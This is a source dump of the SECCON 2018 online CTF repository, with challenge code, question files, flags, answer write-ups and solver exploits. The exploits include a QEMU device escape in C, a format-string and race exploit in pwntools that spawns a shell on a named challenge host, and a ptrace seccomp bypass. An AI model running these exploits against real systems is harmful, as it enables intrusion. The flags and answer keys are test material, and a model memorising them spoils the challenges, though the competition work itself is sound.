 66 |   iomem = mmap(0, 0x600, PROT_READ | PROT_WRITE, MAP_SHARED, mem, 0x00000000febc1000LL);
 67 |   if (iomem == MAP_FAILED) die("mmap error.");
 68 | 
 69 |   cydf = mmap(0, 0x20000, PROT_READ | PROT_WRITE, MAP_SHARED, mem, 0xa0000);
 70 |   if (cydf == MAP_FAILED) die("mmap error.");
 71 | 
 72 |   // avoid (s->vga.sr[0x07] & 0x01) == 0
 73 |   sr(0x07, 0x01);
 74 | 
 75 |   for (int i = 0; i < 0x11; i++) add(0x1000);
 76 |   // leak libc address & thread arena
 77 |   leak();
 78 | 
 79 |   char *hello = "hello world!\n";
 80 |   for (int i = 0; i < strlen(hello); i++) set(0x01, hello[i]);
 81 | 
 82 |   // set fp->_flags
 83 |   sleep(0.5);
 84 |   tmp[0x00] = cydf[0xf63e];
 85 |   sleep(0.5);
 86 |   tmp[0x00] = cydf[0xb620];
 87 |   char *sh = "\nhs;\xad\x22\x84";
 88 |   for (int i = 0; i < 3; i++) set(0x10, sh[3-i-1]);
 89 | 
 90 |   update(0x10, 0x300);
 91 | 
 92 |   sleep(0.5);
 93 |   tmp[0x00] = cydf[0xf63e];
 94 |   sleep(0.5);
 95 |   tmp[0x00] = cydf[0xb6f8];
 96 |   // system - 0x38
 97 |   unsigned char system[8] = "\x00\x00\x00\x00\x00\xee\x77\x38";
 98 |   for (int i = 0; i < 0x8; i++) set(0x10, system[7-i]);
 99 |   
100 |   show(0x01);
101 |   return 0;
102 | }
103 | 


--------------------------------------------------------------------------------
/Pwn/q-escape/question.txt:
--------------------------------------------------------------------------------
1 | q-escape
2 | 
3 | We developed a new device named CYDF :)
4 | Ubuntu 16.04 latest
5 | nc q-escape.pwn.seccon.jp 1337
6 | 


--------------------------------------------------------------------------------
/Pwn/secret_message/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/secret_message/README.md


--------------------------------------------------------------------------------
/Pwn/secret_message/build/Makefile:
--------------------------------------------------------------------------------
 1 | all: secret_message
 2 | secret_message: cipher.o cylib.o main.o
 3 | 	g++ -o secret_message main.o cylib.o cipher.o
 4 | 	strip -s secret_message
 5 | main.o: main.cpp
 6 | 	g++ -c -o main.o main.cpp
 7 | cylib.o: cylib.cpp cylib.h
 8 | 	g++ -c -o cylib.o cylib.cpp
 9 | cipher.o: cipher.cpp cipher.h
10 | 	g++ -c -o cipher.o cipher.cpp
11 | clean:
12 | 	rm secret_message *.o
13 | 


--------------------------------------------------------------------------------
/Pwn/secret_message/build/cipher.h:
--------------------------------------------------------------------------------
 1 | typedef unsigned long long QWORD;
 2 | typedef unsigned int DWORD;
 3 | typedef unsigned char BYTE;
 4 | 
 5 | 
 6 | /****************************** MACROS ******************************/
 7 | #define BLOWFISH_BLOCK_SIZE 8           // Blowfish operates on 8 bytes at a time
 8 | 
 9 | /**************************** DATA TYPES ****************************/
10 | typedef unsigned int  WORD;             // 32-bit word, change to "long" for 16-bit machines
11 | 
12 | typedef struct {
13 | 	WORD p[18];
14 | 	WORD s[4][256];
15 | } BLOWFISH_KEY;
16 | 
17 | typedef struct Matrix {
18 | 	union {
19 | 		double x[16];
20 | 		QWORD q[16];
21 | 	};
22 | 
23 | }Matrix;
24 | typedef struct Part {
25 | 	union {
26 | 		BYTE b[8][8];
27 | 	};
28 | }Part;
29 | Matrix QWORD_to_Matrix(QWORD q);
30 | QWORD Matrix_to_QWORD(Matrix m);
31 | class Cipher {
32 | private:
33 | 	QWORD key, ROUND;
34 | 	Matrix km, km_inv;
35 | 	Matrix const_m;
36 | 	BLOWFISH_KEY bkey;
37 | 	void blowfish_encrypt(const BYTE in[], BYTE out[], const BLOWFISH_KEY *keystruct);
38 | 	void blowfish_decrypt(const BYTE in[], BYTE out[], const BLOWFISH_KEY *keystruct);
39 | 	Matrix Matrix_mul(Matrix x, Matrix y);
40 | 	void blowfish_key_setup(const BYTE user_key[], BLOWFISH_KEY *keystruct, size_t len);
41 | 	Part blowfish_enc(Part x);
42 | 	Part blowfish_dec(Part x);
43 | 	bool Matrix_inv(double m[16], double invOut[16]);
44 | public:
45 | 
46 | 	Cipher();
47 | 	bool setkey(QWORD _key);
48 | 	Matrix decrypt(Matrix c);
49 | 	Matrix encrypt(Matrix p);
50 | };


--------------------------------------------------------------------------------
/Pwn/secret_message/build/cylib.h:
--------------------------------------------------------------------------------
 1 | 
 2 | void cyencode();
 3 | void cyshow();
 4 | 
 5 | 
 6 | 
 7 | 
 8 | 
 9 | /*
10 |  * cy_header
11 |  * from_encode
12 |  * to_encode
13 |  * data
14 |  */
15 | 


--------------------------------------------------------------------------------
/Pwn/secret_message/build/main.cpp:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <iostream>
 3 | #include <time.h>
 4 | #include "cylib.h"
 5 | #include <stdlib.h>
 6 | #include <unistd.h>
 7 | using namespace std;
 8 | void help();
 9 | void init();
10 | 
11 | int main(int argc, char *argv[]) {
12 | 	init();
13 | 	char c;
14 | 	puts("welcome~");
15 | 	c = getchar();
16 | 	switch (c) {
17 | 	case 'e': {
18 | 
19 | 		cyencode();
20 | 
21 | 	}break;
22 | 	case 's': {
23 | 
24 | 		cyshow();
25 | 	}break;
26 | 	default:
27 | 		help();
28 | 	}
29 | 	return 0;
30 | }
31 | 
32 | void help() {
33 | 	puts(":(");
34 | }
35 | void init() {
36 |     setlinebuf(stdin);
37 |     setlinebuf(stdout);
38 | 	srand((unsigned int)time(NULL));
39 | //    chdir("/home/secret_message/");
40 | }


--------------------------------------------------------------------------------
/Pwn/secret_message/ex_helper1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/secret_message/ex_helper1


--------------------------------------------------------------------------------
/Pwn/secret_message/ex_helper2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/secret_message/ex_helper2


--------------------------------------------------------------------------------
/Pwn/secret_message/exploit.py:
--------------------------------------------------------------------------------
  1 | from pwn import *
  2 | 
  3 | #HOST='localhost'
  4 | #PORT=17778
  5 | 
  6 | HOST='secret-message.pwn.seccon.jp'
  7 | PORT=31337
  8 | 
  9 | while(1):
 10 |     try:
 11 |         r1=remote(HOST,PORT)
 12 |         r2=remote(HOST,PORT)
 13 | 
 14 | 
 15 |         show=0x00000000004020AC
 16 |         printf_got=0x000000000060A020
 17 |         filename='%{}c%48$hhn%{}c%60$n%{}c%75$n%2c%92$nhere%58$16llx'.format(0xb0-8,show-(0xb0-8),printf_got-show)
 18 |         print filename
 19 |         to_='a'*0x100
 20 |         from_='b'*0x100
 21 |         r2to='c'*100
 22 |         r2from='d'*100
 23 | 
 24 |         #bp 0x0000000000401419 set $rsi=0x0101010101010117
 25 |         from_=open('files/ex_helper1','rb').read()[0x10:-0x10]
 26 | 
 27 |         print len(from_)
 28 | 
 29 |         r1.sendline('e')
 30 |         r1.sendlineafter('to',to_)
 31 |         r1.sendlineafter('from',from_)
 32 |         r1.sendlineafter('filename',filename)
 33 | 
 34 | 
 35 |         r2.sendline('e')
 36 |         r2.sendlineafter('to',r2to)
 37 |         r2.sendlineafter('from',r2from)
 38 |         r2.sendlineafter('filename',filename)
 39 | 
 40 |         r1.sendlineafter('message length',str(8))
 41 |         r2.sendlineafter('message length',str(9))
 42 |         # r1.interactive()
 43 |         r1.sendafter('message','M'*6)
 44 |         sleep(0.5)
 45 |         r2.sendafter('message','M'*9)
 46 |         sleep(0.5)
 47 |         r2.close()
 48 |         r1.send('M'*2)
 49 |         sleep(0.5)
 50 |         r1.close()
 51 | 
 52 |         #bp 0x0000000000401419 set $rsi=0x0101010101011717
 53 |         from_=open('files/ex_helper2','rb').read()[0x10:-0x10]
 54 | 
 55 |         rs=remote(HOST,PORT)
 56 |         rs.sendline('s')
 57 |         rs.sendlineafter('path',filename)
 58 | 
 59 |         rs.recvuntil('here')
 60 |         # libc_base=int(rs.recv(16).replace(' ',''),16)-0x3eba00
 61 |         libc_base=int(rs.recv(16).replace(' ',''),16)-0x3c48e0
 62 | 
 63 |         print hex(libc_base)
 64 |         # system=libc_base+0x4f440
 65 |         system=libc_base+0x45390
 66 |         filename2='%{}c%88$hn'.format(system&0xffff)
 67 |         x=((system>>16)&0xffff)-(system&0xffff)
 68 |         if x<0:
 69 |             x+=0x10000
 70 |         filename2+='%{}c%87$hn'.format(x)
 71 |         filename2+=';sh'
 72 |         print filename2
 73 | 
 74 |         r3=remote(HOST,PORT)
 75 |         r4=remote(HOST,PORT)
 76 |         r3.sendline('e')
 77 |         r3.sendlineafter('to',to_)
 78 |         r3.sendlineafter('from',from_)
 79 |         r3.sendlineafter('filename',filename2)
 80 |         r4.sendline('e')
 81 |         r4.sendlineafter('to',r2to)
 82 |         r4.sendlineafter('from',r2from)
 83 |         r4.sendlineafter('filename',filename2)
 84 |         r3.sendlineafter('message length',str(8))
 85 |         r4.sendlineafter('message length',str(9))
 86 |         r3.sendafter('message','M'*6)
 87 |         sleep(0.3)
 88 |         r4.sendafter('message','M'*9)
 89 |         sleep(0.3)
 90 |         r4.close()
 91 |         r3.send('M'*2)
 92 |         sleep(0.2)
 93 |         r3.close()
 94 | 
 95 |         x=rs.recvuntil('path',timeout=1)
 96 |         if not x:
 97 |             rs.close()
 98 | 
 99 |         rs.sendline(filename2)
100 |         rs.interactive()
101 |     except:
102 |         # break
103 |         continue
104 | 


--------------------------------------------------------------------------------
/Pwn/secret_message/files/secret_message.tar.gz_886d5d76439d30bd4dfbb5f3e4a0d78611c78f72:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/secret_message/files/secret_message.tar.gz_886d5d76439d30bd4dfbb5f3e4a0d78611c78f72


--------------------------------------------------------------------------------
/Pwn/secret_message/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{54a27f3a76973d08b8124f3b7e1a7d12}
2 | 


--------------------------------------------------------------------------------
/Pwn/secret_message/question.txt:
--------------------------------------------------------------------------------
1 | secret_message
2 | 
3 | Let's share a secret with us
4 | nc secret-message.pwn.seccon.jp 31337


--------------------------------------------------------------------------------
/Pwn/simple_memo/exploit.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/simple_memo/exploit.bin


--------------------------------------------------------------------------------
/Pwn/simple_memo/exploit.c:
--------------------------------------------------------------------------------
  1 | // gcc -fomit-frame-pointer -fno-stack-protector -nostdlib -fPIE -masm=intel -c exploit.c && ld --oformat=binary exploit.o -o exploit.bin
  2 | #include <stdio.h>
  3 | #include <stdlib.h>
  4 | #include <unistd.h>
  5 | #include <fcntl.h>
  6 | #include <signal.h>
  7 | #include <sys/user.h>
  8 | #include <sys/wait.h>
  9 | #include <sys/ptrace.h>
 10 | #include <sys/syscall.h>
 11 | 
 12 | #define SYS_alt_open 0xdead
 13 | 
 14 | static void tracer(pid_t pid);
 15 | static int tracee(void);
 16 | 
 17 | int _open(const char *pathname, int flags);
 18 | long _ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data);
 19 | 
 20 | void main(void){
 21 | 	pid_t pid;
 22 | 
 23 | 	switch(pid = fork()){
 24 | 		case 0:
 25 | 			tracee();
 26 | 			break;
 27 | 		case -1:
 28 | 			exit(-1);
 29 | 		default:
 30 | 			tracer(pid);
 31 | 			break;
 32 | 	}
 33 | 
 34 | 	exit(0);
 35 | }
 36 | 
 37 | static void tracer(pid_t pid){
 38 | 	int status;
 39 | 
 40 | 	waitpid(pid, &status, 0);
 41 | 	if(WIFEXITED(status) || WIFSIGNALED(status))
 42 | 		return;
 43 | 
 44 | 	for(;;){
 45 | 		struct user_regs_struct regs;
 46 | 
 47 | 		_ptrace(PTRACE_SYSCALL, pid, NULL, 0);
 48 | 		waitpid(pid, &status, 0);
 49 | 		if(!(WIFSTOPPED(status) && WSTOPSIG(status) == SIGTRAP))
 50 | 			break;
 51 | 
 52 | 		if(_ptrace(PTRACE_GETREGS, pid, NULL, &regs))
 53 | 			break;
 54 | 		if(regs.orig_rax == SYS_alt_open){
 55 | 			regs.orig_rax = SYS_open;
 56 | 			_ptrace(PTRACE_SETREGS, pid, NULL, &regs);
 57 | 		}
 58 | 	}
 59 | }
 60 | 
 61 | static int tracee(void){
 62 | 	int fd, n;
 63 | 	char buf[512];
 64 | 
 65 | 	if(_ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
 66 | 		return -1;
 67 | 	kill(getpid(), SIGSTOP);
 68 | 
 69 | 	if((fd = _open("flag.txt", O_RDONLY)) == -1)
 70 | 		return -1;
 71 | 	n = read(fd, buf, sizeof(buf));
 72 | 	write(STDOUT_FILENO, buf, n);
 73 | 
 74 | 	return n;
 75 | }
 76 | 
 77 | int _open(const char *pathname, int flags){
 78 | 	asm volatile ("syscall" :: "a"(SYS_alt_open));
 79 | }
 80 | 
 81 | ssize_t read(int fd, void *buf, size_t count){
 82 | 	asm volatile ("syscall" :: "a"(SYS_read));
 83 | }
 84 | 
 85 | ssize_t write(int fd, const void *buf, size_t count){
 86 | 	asm volatile ("syscall" :: "a"(SYS_write));
 87 | }
 88 | 
 89 | pid_t getpid(void){
 90 | 	asm volatile ("syscall" :: "a"(SYS_getpid));
 91 | }
 92 | 
 93 | pid_t fork(void){
 94 | 	asm volatile ("syscall" :: "a"(SYS_fork));
 95 | }
 96 | 
 97 | void exit(int status){
 98 | 	asm volatile ("syscall" :: "a"(SYS_exit));
 99 | }
100 | 
101 | pid_t waitpid(pid_t pid, int *status, int options){
102 | 	asm volatile ("mov r10, 0\r\nsyscall" :: "a"(SYS_wait4));
103 | }
104 | 
105 | int kill(pid_t pid, int sig){
106 | 	asm volatile ("syscall" :: "a"(SYS_kill));
107 | }
108 | 
109 | long _ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data){
110 | 	asm volatile ("mov r10, rcx\r\nsyscall" :: "a"(SYS_ptrace));
111 | }
112 | 


--------------------------------------------------------------------------------
/Pwn/simple_memo/files/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/simple_memo/files/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253


--------------------------------------------------------------------------------
/Pwn/simple_memo/files/memo_ba2e54eda5aca5ca5c187a3e0603d4ce623aee62:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/simple_memo/files/memo_ba2e54eda5aca5ca5c187a3e0603d4ce623aee62


--------------------------------------------------------------------------------
/Pwn/simple_memo/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{bl4ck_l157_SECCOMP_h45_l075_0f_l00ph0l35}
2 | 


--------------------------------------------------------------------------------
/Pwn/simple_memo/question.txt:
--------------------------------------------------------------------------------
1 | SimpleMemo
2 | 
3 | Host:smemo.pwn.seccon.jp 
4 | Port: 36384
5 | 


--------------------------------------------------------------------------------
/QR/QRChecker/answer.txt:
--------------------------------------------------------------------------------
1 | Please upload exploit.jpg. 
2 | 


--------------------------------------------------------------------------------
/QR/QRChecker/build/flag:
--------------------------------------------------------------------------------
1 | 50d7bc7542b5837a7c5b94cf2446b848
2 | 


--------------------------------------------------------------------------------
/QR/QRChecker/build/qr.cgi:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | import sys, io, cgi, os
 3 | from PIL import Image
 4 | import zbarlight
 5 | print("Content-Type: text/html")
 6 | print("")
 7 | codes = set()
 8 | sizes = [500, 250, 100, 50]
 9 | print('<html><body>')
10 | print('<form action="' + os.path.basename(__file__) + '" method="post" enctype="multipart/form-data">')
11 | print('<input type="file" name="uploadFile"/>')
12 | print('<input type="submit" value="submit"/>')
13 | print('</form>')
14 | print('<pre>')
15 | try:
16 | 	form = cgi.FieldStorage()
17 | 	data = form["uploadFile"].file.read(1024 * 256)
18 | 	image= Image.open(io.BytesIO(data))
19 | 	for sz in sizes:
20 | 		image = image.resize((sz, sz))
21 | 		result= zbarlight.scan_codes('qrcode', image)
22 | 		if result == None:
23 | 			break
24 | 		if 1 < len(result):
25 | 			break
26 | 		codes.add(result[0])
27 | 	for c in sorted(list(codes)):
28 | 		print(c.decode())
29 | 	if 1 < len(codes):
30 | 		print("SECCON{" + open("flag").read().rstrip() + "}")
31 | except:
32 | 	pass
33 | print('</pre>')
34 | print('</body></html>')
35 | 
36 | 


--------------------------------------------------------------------------------
/QR/QRChecker/build/readme:
--------------------------------------------------------------------------------
 1 | This challenge need a web server. the below is how to setup.
 2 | [Ubuntu]
 3 | apt install libzbar0
 4 | apt install libzbar-dev
 5 | apt install zbar-tools
 6 | apt install python3-pip
 7 | pip3 install setuptools --upgrade
 8 | pip3 install zbarlight
 9 | pip3 install pillow
10 | 
11 | 1. Install HTTP server.
12 | 2. input below command
13 | 
14 | $ cp qr.cgi to /usr/lib/cgi-bin/
15 | $ cp flag to /usr/lib/cgi-bin/
16 | $ chmod 666 /usr/lib/cgi-bin/flag
17 | 
18 | Please check the permission of flag file.
19 | Player can't access the flag file in cg-bin.
20 | 
21 | 


--------------------------------------------------------------------------------
/QR/QRChecker/exploit.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/QR/QRChecker/exploit.jpg


--------------------------------------------------------------------------------
/QR/QRChecker/files/qr.cgi_93bb1a11da93ab2a50e61c7da1e62b34d316bc9b:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | import sys, io, cgi, os
 3 | from PIL import Image
 4 | import zbarlight
 5 | print("Content-Type: text/html")
 6 | print("")
 7 | codes = set()
 8 | sizes = [500, 250, 100, 50]
 9 | print('<html><body>')
10 | print('<form action="' + os.path.basename(__file__) + '" method="post" enctype="multipart/form-data">')
11 | print('<input type="file" name="uploadFile"/>')
12 | print('<input type="submit" value="submit"/>')
13 | print('</form>')
14 | print('<pre>')
15 | try:
16 | 	form = cgi.FieldStorage()
17 | 	data = form["uploadFile"].file.read(1024 * 256)
18 | 	image= Image.open(io.BytesIO(data))
19 | 	for sz in sizes:
20 | 		image = image.resize((sz, sz))
21 | 		result= zbarlight.scan_codes('qrcode', image)
22 | 		if result == None:
23 | 			break
24 | 		if 1 < len(result):
25 | 			break
26 | 		codes.add(result[0])
27 | 	for c in sorted(list(codes)):
28 | 		print(c.decode())
29 | 	if 1 < len(codes):
30 | 		print("SECCON{" + open("flag").read().rstrip() + "}")
31 | except:
32 | 	pass
33 | print('</pre>')
34 | print('</body></html>')
35 | 
36 | 


--------------------------------------------------------------------------------
/QR/QRChecker/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{50d7bc7542b5837a7c5b94cf2446b848}
2 | 


--------------------------------------------------------------------------------
/QR/QRChecker/question.txt:
--------------------------------------------------------------------------------
1 | QR Checker
2 | http://qrchecker.pwn.seccon.jp/
3 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # SECCON 2018 Online CTF
 2 | 
 3 | ## Score Server
 4 | - https://score-quals.seccon.jp/scoreboard
 5 | 
 6 | ## Top 30 Ranking()
 7 | 
 8 | |Rank|Point|Team|
 9 | |---|---|---|
10 | |1|Blue-Lotus|6143|
11 | |2|TSG|5160|
12 | |3|CodeRed|4875|
13 | |4|NaruseJun|4741|
14 | |5|BlueBananaKing|4705|
15 | |6|dcua|4700|
16 | |7|noraneco|4245|
17 | |8|Pwnight|4240|
18 | |9|urandom|3997|
19 | |10|217|3919|
20 | |11|Balsn|3852|
21 | |12|GYG|3811|
22 | |13|PDKT|3579|
23 | |14|10sec|3557|
24 | |15|dodododo|3528|
25 | |16|DoubleFox|3507|
26 | |17|Bluemermaid|3507|
27 | |18|Tower of Hanoi|3404|
28 | |19|TenDollar|3392|
29 | |20|r3kapig|3270|
30 | |21|SUSlo.PAS|3182|
31 | |22|PwnThyBytes|2983|
32 | |23|YOKARO-MON|2954|
33 | |24|Bushwhackers|2945|
34 | |25|KAIST GoN|2851|
35 | |26|p4|2629|
36 | |27|Team Enu|2592|
37 | |28|yharima|2535|
38 | |29|0ops|2489|
39 | |30|perfect blue|2451|
40 | 


--------------------------------------------------------------------------------
/Reversing/Runme/answer.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/Runme/answer.txt


--------------------------------------------------------------------------------
/Reversing/Runme/build/create.py:
--------------------------------------------------------------------------------
 1 | function_start='''
 2 | push ebp
 3 | mov  ebp,esp
 4 | push esi '''
 5 | 
 6 | function_end='''
 7 | pop esi
 8 | mov esp, ebp
 9 | pop ebp
10 | ret
11 | '''
12 | 
13 | answer='"C:\\Temp\\SECCON2018Online.exe" SECCON{Runn1n6_P47h}'
14 | print len(answer)
15 | 
16 | exit
17 | for x in range(len(answer)):
18 |     print 'test' + str(x) + ':'
19 |     print function_start
20 |     print 'movzx    ecx, BYTE [ebp+0x8]'
21 |     print 'mov      edx, [ebp+0xc]'
22 |     print 'movzx    edx, BYTE [edx]'
23 |     print 'cmp      ecx, edx'
24 |     print 'jne      exit'
25 |     print ''
26 |     print 'mov      ecx,' + str(x)
27 |     print 'mov      edx, [ebp+0xc]'
28 |     print 'inc      edx'
29 |     print 'push     edx'
30 |     print 'push     ' +  str(ord(answer[x:x+1])) + ' ;' + answer[x:x+1]
31 |     print 'call test' + str(x+1)
32 |     print function_end
33 |     print ';-------------------------------------'
34 | 
35 | 
36 | 


--------------------------------------------------------------------------------
/Reversing/Runme/files/runme.exe_b834d0ce1d709affeedb1ee4c2f9c5d8ca4aac68:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/Runme/files/runme.exe_b834d0ce1d709affeedb1ee4c2f9c5d8ca4aac68


--------------------------------------------------------------------------------
/Reversing/Runme/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{Runn1n6_P47h}


--------------------------------------------------------------------------------
/Reversing/Runme/question.txt:
--------------------------------------------------------------------------------
1 | Runme
2 | Run me.
3 | 


--------------------------------------------------------------------------------
/Reversing/block/answer.txt:
--------------------------------------------------------------------------------
 1 | ## JP
 2 | 
 3 | 1. apkファイルをZIPとして解凍します。
 4 | 2. "assets/bin/Data/sharedassets0.assets" をデコードします。(各種補助ツール的なものを使うもよし、手動でパースするもよし。uTinyRipperを使うと一発でデコードされます。)
 5 | 3. Plateに設定されているカスタムシェーダのコードを読みます。
 6 | 4. 特定のX軸のピクセルがスワップされていることがわかります。
 7 | 5. その情報を元に手動でflagテクスチャの画像をいじると答えがわかります。
 8 | 
 9 | ## EN
10 | 
11 | 1. Unzip the apk file.
12 | 2. Decode "assets/bin/Data/sharedassets0.assets". (You can decode various tools. Ex. uTinyRipper is useful.)
13 | 3. Read the custom shader code.
14 | 4. You notice that some pixels on the x-axis are swapped.
15 | 5. Try to swap pixels with flag texture.
16 | 
17 | 


--------------------------------------------------------------------------------
/Reversing/block/builds/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/block/builds/flag.png


--------------------------------------------------------------------------------
/Reversing/block/builds/rotation.cs:
--------------------------------------------------------------------------------
 1 | using System.Collections;
 2 | using System.Collections.Generic;
 3 | using UnityEngine;
 4 | 
 5 | public class rotation : MonoBehaviour {
 6 | 
 7 | 	// Use this for initialization
 8 | 	void Start () {
 9 | 		
10 | 	}
11 | 	
12 | 	// Update is called once per frame
13 | 	void Update () {
14 |         transform.Rotate(new Vector3(0.0f, 10.0f, 0.0f));
15 | 	}
16 | }
17 | 


--------------------------------------------------------------------------------
/Reversing/block/builds/shader.shader:
--------------------------------------------------------------------------------
 1 | Shader "Custom/shader" {
 2 | 	Properties {
 3 | 		_MainTex ("Albedo", 2D) = "white" {}
 4 | 	}
 5 | 	SubShader {
 6 | 		Tags { "RenderType"="Opaque" }
 7 | 		LOD 200
 8 | 
 9 | 		CGPROGRAM
10 | 		// Physically based Standard lighting model, and enable shadows on all light types
11 | 		#pragma surface surf Standard fullforwardshadows
12 | 
13 | 		// Use shader model 3.0 target, to get nicer looking lighting
14 | 		#pragma target 3.0
15 | 
16 | 		sampler2D _MainTex;
17 | 
18 | 		struct Input {
19 | 			float2 uv_MainTex;
20 | 		};
21 | 
22 | 		void surf (Input IN, inout SurfaceOutputStandard o) {
23 | 			// Albedo comes from a texture tinted by color
24 |             fixed4 c;
25 |             if (IN.uv_MainTex.x >= 0.375 && IN.uv_MainTex.x < 0.422) {
26 |                 IN.uv_MainTex.x += 0.050;
27 |             } else if (IN.uv_MainTex.x >= 0.422 && IN.uv_MainTex.x < 0.469) {
28 |                 IN.uv_MainTex.x -= 0.050;
29 |             } else if (IN.uv_MainTex.x >= 0.180 && IN.uv_MainTex.x < 0.253) {
30 |                 IN.uv_MainTex.x += 0.1;
31 |             } else if (IN.uv_MainTex.x >= 0.276 && IN.uv_MainTex.x < 0.348) {
32 |                 IN.uv_MainTex.x -= 0.095;
33 |             } else {
34 |             }
35 |             c = tex2D (_MainTex, IN.uv_MainTex);
36 | 			o.Albedo = c.rgb;
37 | 		}
38 | 		ENDCG
39 | 	}
40 | 	FallBack "Diffuse"
41 | }
42 | 


--------------------------------------------------------------------------------
/Reversing/block/files/block.apk_f2f0a7d6a3b3e940ca7cd5a3f7c5045eb57f92cf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Reversing/block/files/block.apk_f2f0a7d6a3b3e940ca7cd5a3f7c5045eb57f92cf


--------------------------------------------------------------------------------
/Reversing/block/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{4R3_Y0U_CH34+3R?}
2 | 


--------------------------------------------------------------------------------
/Reversing/block/question.txt:
--------------------------------------------------------------------------------
1 | BREAK THE BLOCK!
2 | 


--------------------------------------------------------------------------------
/Reversing/shooter/answer.txt:
--------------------------------------------------------------------------------
 1 | # Answer
 2 | 
 3 | 1. Extract apk as a zip file.
 4 | 2. Find the domain name of the staging environment and development environment from `\ assets \ bin \ Data \ Managed \ Metadata \ global-metadata.dat`. Also find that `/ admin` exists.
 5 | 3. Verify that `/ admin` exists for the staging or production environment.
 6 | 4. Attack because SQLi exists in the password field for the login form of `/ admin` in the staging environment.
 7 | 5. Get the flag from the `flags` table on the database.
 8 | 
 9 | # Solution
10 | 
11 | If you play the game with the appropriate Android emulator (Nox etc.), you can see that it is compatible with online ranking.
12 | Looking at the packet, you can see that it is communicating with the server, but there is no particular vulnerability in this API.
13 | If you try to open `/ admin` for the domain of the communication destination, you can see that the page exists, but it can not be opened with access control.
14 | By parsing the application, domains of multiple servers can be found. From the domain name, you can see that it seems to be a development environment and a staging environment.
15 | Only in the staging environment, since the IP control is not done, the management screen opens.
16 | On the management screen, you are asked to log in. The password field of this login form has SQLi vulnerability.
17 | You can use this SQLi to acquire flags from the database.
18 | 
19 | # Background
20 | 
21 | If you leave unnecessary information in the application, there is a possibility that environments that you do not want to access often are leaked out.
22 | Also, a question from an actual case that access control leaks overlap will result in unexpected access.
23 | Even if you have a query builder, such as Rails' ActiveRecord, SQLi can occur if you make a mistake.
24 | 
25 | 
26 | 
27 | --------
28 | 
29 | # 解答
30 | 
31 | 1. apkをzipファイルとして解凍する。
32 | 2. `\assets\bin\Data\Managed\Metadata\global-metadata.dat` からステージング環境と開発環境のドメイン名を見つける。更に `/admin` が存在することを見つける。
33 | 3. ステージング環境または本番環境に対して `/admin` が存在することを確認する。
34 | 4. ステージング環境の `/admin` のログインフォームに対してパスワードの欄に SQLi が存在するので攻撃する。
35 | 5. データベース上の `flags` テーブルからフラッグをゲット。
36 | 
37 | # 解法
38 | 
39 | 適当なAndroidエミュレータ(Nox等)でゲームをプレイすると、オンラインランキングに対応していることが分かる。
40 | パケットを見ると、サーバと通信していることが分かるが、このAPIには特に脆弱性は存在しない。
41 | 通信先のドメインに対して `/admin` を開こうとすると、ページが存在していることは分かるが、アクセス制御されていて開けない。
42 | アプリを解析すると、複数のサーバのドメインが見つかる。ドメイン名から、開発環境とステージング環境らしきことが分かる。
43 | ステージング環境のみ、IP制御がされていないため、管理画面が開けてしまう。
44 | 管理画面では、ログインを求められる。このログインフォームのパスワード欄には、SQLiの脆弱性がある。
45 | このSQLiを利用し、データベース上からフラッグを獲得できる。
46 | 
47 | # 背景
48 | 
49 | アプリ内に不要な情報を残すと、あまりアクセスしてほしくない環境が漏れてしまう可能性があるということ。
50 | また、アクセス制御漏れが重なると、予期せぬアクセスを許可してしまうことになるという実際の事例からの出題。
51 | RailsのActiveRecordなど、クエリビルダが備わっているものも、扱いを間違えるとSQLiが発生しうる。
52 | 


--------------------------------------------------------------------------------
/Reversing/shooter/build/app/scripts/Config.cs:
--------------------------------------------------------------------------------
 1 | using System.Collections;
 2 | using System.Collections.Generic;
 3 | using UnityEngine;
 4 | 
 5 | public static class Config {
 6 |     public static string domain = "shooter.pwn.seccon.jp";
